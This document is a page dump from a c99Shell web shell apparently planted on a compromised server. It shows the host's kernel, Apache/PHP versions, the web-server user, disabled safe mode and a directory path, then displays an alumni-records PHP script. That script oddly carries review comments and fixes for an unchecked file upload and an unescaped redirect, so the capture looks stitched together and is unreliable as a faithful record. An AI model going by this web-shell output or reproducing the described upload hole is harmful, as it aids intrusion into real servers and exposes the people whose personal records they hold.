!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ealumni/admin/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)


Viewing file:     processalumni.php (11.96 KB)      -rwxr-xr-x
<?php
include_once "../../class/clsConnection.php";
include_once 
"../../class/clsDB.php";
include_once 
"../global.php";
include_once 
"../class/clshisaword.php";
include_once 
"../class/clshiswork.php";
include_once 
"../class/clsalumnibio.php";
include_once 
"../class/clsalumnimain.php";
include_once 
"../link/function.php";

// One data-access object per record type this script reads and writes.
// $oC1 is not assigned in this file; presumably it is the connection created by
// one of the includes above — confirm.
$oHa = new HisAword($oC1);
$oHw = new HisWork($oC1);
$oAb = new AlumniBio($oC1);
$oAm = new AlumniMain($oC1);
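// status "1" (or empty): update the alumni bio record ($oAb) and the alumni main
// record ($oAm) for $alumniId, optionally replacing the stored picture.
//
// NOTE(review): none of the plain variables read here ($alumniId, $nationId,
// $uploadfile, ...) are assigned in this file; presumably they are request
// parameters made global by register_globals or by an include — confirm. Every
// one of them must be treated as untrusted input.
// NOTE(review): no authentication or authorisation check is visible in this
// file; confirm that one of the includes enforces it before any write happens.
if ($status == "1" || $status == "") {
    $oAb->SearchByKey($alumniId);
    $oAb->GetRecord();
    $oAb->Edit();

    // Fields taken from the request.
    $oAb->alumniId = $alumniId;
    $oAb->nationId = $nationId;
    $oAb->religionId = $religionId;
    $oAb->bloodGroup = $bloodGroup;
    $oAb->birthDate = splitDateForm($birthDate, "/");
    $oAb->o1prefixId = $o1prefixId;
    $oAb->o1fName = $o1fName;
    $oAb->o1lName = $o1lName;
    $oAb->o2prefixId = $o2prefixId;
    $oAb->o2fName = $o2fName;
    $oAb->o2lName = $o2lName;

    // Fields the original code re-assigns to themselves. The assignments are kept
    // because it is not visible here whether Edit()/Save() depend on them.
    foreach (array(
        'studentId', 'birthProvinceId',
        'homeAddress', 'homeDistrictId', 'homeAmphurId', 'homeProvinceId', 'homeZipcode', 'homePhoneNo',
        'officeName', 'officeAddress', 'officeDistrictId', 'officeAmphurId', 'officeProvinceId',
        'officeZipcode', 'officePhoneNo',
        'workingStatus', 'workingPosition', 'workingSalary',
        'fatherName', 'fatherAddress', 'fatherDistrictId', 'fatherAmphurId', 'fatherProvinceId',
        'fatherZipcode', 'fatherPhoneNo', 'fatherOccupation', 'fatherStatus',
        'motherName', 'motherAddress', 'motherDistrictId', 'motherAmphurId', 'motherProvinceId',
        'motherZipcode', 'motherPhoneNo', 'motherOccupation', 'motherStatus',
        'studentSex',
        'parentName', 'parentRelation', 'parentAddress', 'parentDistrictId', 'parentAmphurId',
        'parentProvinceId', 'parentZipcode', 'parentPhoneNo', 'parentMobile', 'parentOcc',
        'parentIncome', 'parentEmail',
        'contactPerson', 'contactAddress', 'contactDistrictId', 'contactAmphurId',
        'contactProvinceId', 'contactZipcode', 'contactPhoneNo',
        'cardExpiryDate',
        'currentAddress', 'currentDistrictId', 'currentAmphurId', 'currentProvinceId',
        'currentZipcode', 'currentPhoneNo',
        'graduateAddress', 'graduateDistrictId', 'graduateAmphurId', 'graduateProvinceId',
        'graduateZipcode', 'graduatePhoneNo',
        'maritalStatusId', 'weight', 'height',
        'recruitmentTypeId', 'occExamResult', 'canRefund', 'oldStudentName', 'entryDegree',
        'healthPrivId',
    ) as $keptField) {
        $oAb->$keptField = $oAb->$keptField;
    }
    unset($keptField);

    // Picture
    // The listing shows `$rootdir "../picturePerson";` with no `=`, which does not
    // parse; the assignment is restored here.
    $rootdir = "../picturePerson";
    $picturePath = "";

    // The original copied $uploadfile to "$rootdir/$uploadfile_name" with no checks,
    // so the client chose both the source path and the stored name and extension
    // inside a web-served directory. The upload is now accepted only when:
    //   - is_uploaded_file() confirms the source is this request's HTTP upload and
    //     not a path passed in as an ordinary request parameter;
    //   - the extension is on an image allowlist (a conservative assumption —
    //     adjust to the formats the application really needs);
    //   - getimagesize() recognises the content as an image.
    // The stored name is generated on the server, so directory separators, extra
    // extensions and overwrites of existing files cannot come from the client.
    if (isset($uploadfile, $uploadfile_name) && $uploadfile_name != "" && is_uploaded_file($uploadfile)) {
        $nameParts = pathinfo(basename($uploadfile_name));
        $extension = isset($nameParts['extension']) ? strtolower($nameParts['extension']) : "";
        if (in_array($extension, array("jpg", "jpeg", "png", "gif"), true)
            && getimagesize($uploadfile) !== false) {
            $storedPath = "$rootdir/" . md5(uniqid(mt_rand(), true)) . "." . $extension;
            if (move_uploaded_file($uploadfile, $storedPath)) {
                $picturePath = $storedPath;
            }
        }
    }

    // No accepted upload: fall back to the path the form sent back, as before.
    // NOTE(review): $picturePerson is request-supplied too and is stored as-is;
    // confirm it is validated wherever the picture path is rendered.
    if ($picturePath == "") {
        //$picturePath='../pictureStud/photo.gif';
        $picturePath = $picturePerson;
    }
    if ($picturePath == "") {
        $oAb->picturePath = $oAb->picturePath;
    } else {
        $oAb->picturePath = $picturePath;
    }

    $oAb->Save();

    $oAm->SearchByKey($alumniId);
    $oAm->GetRecord();
    $oAm->Edit();

    // Fields taken from the request.
    $oAm->alumniId = $alumniId;
    $oAm->programId = $programId;
    $oAm->prefixId = $prefixId;
    $oAm->studentName = $studentName;
    $oAm->studentSurname = $studentSurname;
    $oAm->studentNameEng = $studentNameEng;
    $oAm->studentSurnameEng = $studentSurnameEng;
    $oAm->admitAcadYear = $admitAcadYear;
    $oAm->admitDate = splitDateForm($admitDate, "/");
    $oAm->finishDate = splitDateForm($finishDate, "/");
    $oAm->studentEmail = $studentEmail;
    $oAm->citizenId = $citizenId;
    $oAm->studentSex = $studentSex;
    $oAm->finishAcadYear = $finishAcadYear;

    // Fields re-assigned to themselves, kept for the same reason as above.
    foreach (array(
        'studentId', 'studentCode', 'levelId', 'creditAttempt', 'creditSatisfy', 'GPA',
        'admitSemester', 'studentPassword', 'studentYear', 'studentStatus',
        'officerId1', 'officerId2', 'financeStatus', 'updateUserId', 'updateDateTime',
        'graduateYear', 'genStatus', 'genNo', 'entryTypeId', 'entryTypeId2', 'scholarId',
        'preAdmitPositionId', 'totalPoint', 'honor', 'medal', 'exitExam', 'studentStatusTmp',
        'importtoalumni', 'glantId', 'glantDate', 'glantreqDate',
    ) as $keptField) {
        $oAm->$keptField = $oAm->$keptField;
    }
    unset($keptField);

    $oAm->Save();
}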
// status "2": update only the home, office and current address fields of the
// alumni bio record; every other field is written back unchanged.
//
// NOTE(review): the right-hand variables are not assigned in this file;
// presumably they are request parameters made global by register_globals or by
// an include — confirm, and treat them as untrusted input.
if ($status == "2") {
    $oAb->SearchByKey($alumniId);
    $oAb->GetRecord();
    $oAb->Edit();

    // Values supplied by the request.
    $oAb->alumniId = $alumniId;

    $oAb->homeAddress = $homeAddress;
    $oAb->homeDistrictId = $homeDistrictId;
    $oAb->homeAmphurId = $homeAmphurId;
    $oAb->homeProvinceId = $homeProvinceId;
    $oAb->homeZipcode = $homeZipcode;
    $oAb->homePhoneNo = $homePhoneNo;

    $oAb->officeName = $officeName;
    $oAb->officeAddress = $officeAddress;
    $oAb->officeDistrictId = $officeDistrictId;
    $oAb->officeAmphurId = $officeAmphurId;
    $oAb->officeProvinceId = $officeProvinceId;
    $oAb->officeZipcode = $officeZipcode;
    $oAb->officePhoneNo = $officePhoneNo;

    $oAb->currentAddress = $currentAddress;
    $oAb->currentDistrictId = $currentDistrictId;
    $oAb->currentAmphurId = $currentAmphurId;
    $oAb->currentProvinceId = $currentProvinceId;
    $oAb->currentZipcode = $currentZipcode;
    $oAb->currentPhoneNo = $currentPhoneNo;

    // Everything else is assigned back to itself, exactly as before; whether
    // Edit()/Save() rely on these writes is not visible from this file.
    foreach (array(
        'studentId', 'nationId', 'religionId', 'bloodGroup', 'birthDate', 'birthProvinceId',
        'workingStatus', 'workingPosition', 'workingSalary',
        'fatherName', 'fatherAddress', 'fatherDistrictId', 'fatherAmphurId', 'fatherProvinceId',
        'fatherZipcode', 'fatherPhoneNo', 'fatherOccupation', 'fatherStatus',
        'motherName', 'motherAddress', 'motherDistrictId', 'motherAmphurId', 'motherProvinceId',
        'motherZipcode', 'motherPhoneNo', 'motherOccupation', 'motherStatus',
        'studentSex',
        'parentName', 'parentRelation', 'parentAddress', 'parentDistrictId', 'parentAmphurId',
        'parentProvinceId', 'parentZipcode', 'parentPhoneNo', 'parentMobile', 'parentOcc',
        'parentIncome', 'parentEmail',
        'contactPerson', 'contactAddress', 'contactDistrictId', 'contactAmphurId',
        'contactProvinceId', 'contactZipcode', 'contactPhoneNo',
        'cardExpiryDate',
        'graduateAddress', 'graduateDistrictId', 'graduateAmphurId', 'graduateProvinceId',
        'graduateZipcode', 'graduatePhoneNo',
        'maritalStatusId', 'weight', 'height', 'picturePath',
        'recruitmentTypeId', 'occExamResult', 'canRefund', 'oldStudentName', 'entryDegree',
        'healthPrivId',
        'o1prefixId', 'o1fName', 'o1lName', 'o2prefixId', 'o2fName', 'o2lName',
    ) as $keptField) {
        $oAb->$keptField = $oAb->$keptField;
    }
    unset($keptField);

    $oAb->Save();
}
// status "3" maintains work-history rows through $oHw; status "4" maintains
// award rows through $oHa. $method selects the operation: "delete" removes the
// row found by $seqId, "edited" updates it, and any other value adds a new row.
//
// NOTE(review): nothing visible here checks that the row found by $seqId belongs
// to $alumniId; confirm that the record classes or the caller enforce it.
if ($status == "3") {
    if ($method == "delete") {
        $oHw->SearchByKey($seqId);
        $oHw->GetRecord();

        $oHw->Delete();
    } else {
        if ($method == "edited") {
            // Load the existing row and keep its key.
            $oHw->SearchByKey($seqId);
            $oHw->GetRecord();
            $oHw->Edit();
            $oHw->seqId = $seqId;
        } else {
            // New row: the key comes from GetNextCode().
            $oHw->AddNew();
            $oHw->seqId = $oHw->GetNextCode();
        }

        // Both the add and the edit path write the same request values.
        $oHw->alumniId = $alumniId;
        $oHw->companyNameT = $companyNameT;
        $oHw->companyNameE = $companyNameE;
        $oHw->companyAddr = $companyAddr;
        $oHw->companyPosition = $companyPosition;
        $oHw->companyAdmidPosYear = $companyAdmidPosYear;

        $oHw->Save();
    }
} else if ($status == "4") {
    if ($method == "delete") {
        $oHa->SearchByKey($seqId);
        $oHa->GetRecord();

        $oHa->Delete();
    } else {
        if ($method == "edited") {
            // Load the existing row and keep its key.
            $oHa->SearchByKey($seqId);
            $oHa->GetRecord();
            $oHa->Edit();
            $oHa->seqId = $seqId;
        } else {
            // New row: the key comes from GetNextCode().
            $oHa->AddNew();
            $oHa->seqId = $oHa->GetNextCode();
        }

        // Both the add and the edit path write the same request values.
        $oHa->alumniId = $alumniId;
        $oHa->awordNameT = $awordNameT;
        $oHa->awordNameE = $awordNameE;
        $oHa->awordCompany = $awordCompany;
        $oHa->typeawordId = $typeawordId;
        $oHa->levelawordId = $levelawordId;
        $oHa->awordYear = $awordYear;

        $oHa->Save();
    }
}

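// Send the browser back to mainalumni.php with the same record and mode.
// $alumniId, $status and $method are not assigned in this file and must be
// treated as untrusted. The original interpolated them straight into the
// attribute, so a quote or angle bracket in any of them could break out of the
// tag. Each value is now URL-encoded as a query parameter, and the finished URL
// is HTML-escaped for the single-quoted attribute it is placed in.
$redirectUrl = 'mainalumni.php?alumniId=' . urlencode((string) $alumniId)
    . '&status=' . urlencode((string) $status)
    . '&method=' . urlencode((string) $method);
echo "<meta http-equiv='refresh' content='0; URL=" . htmlspecialchars($redirectUrl, ENT_QUOTES) . "'>";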

?>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0209 ]--